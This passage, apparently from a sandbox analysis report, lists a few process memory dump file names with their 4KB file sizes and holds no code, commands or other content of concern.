                                                                                                                                            3.5MB

                                                                                                                                          • memory/3824-219-0x0000000004900000-0x0000000004901000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3852-220-0x0000000001070000-0x0000000001071000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4064-221-0x0000000004940000-0x0000000004941000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB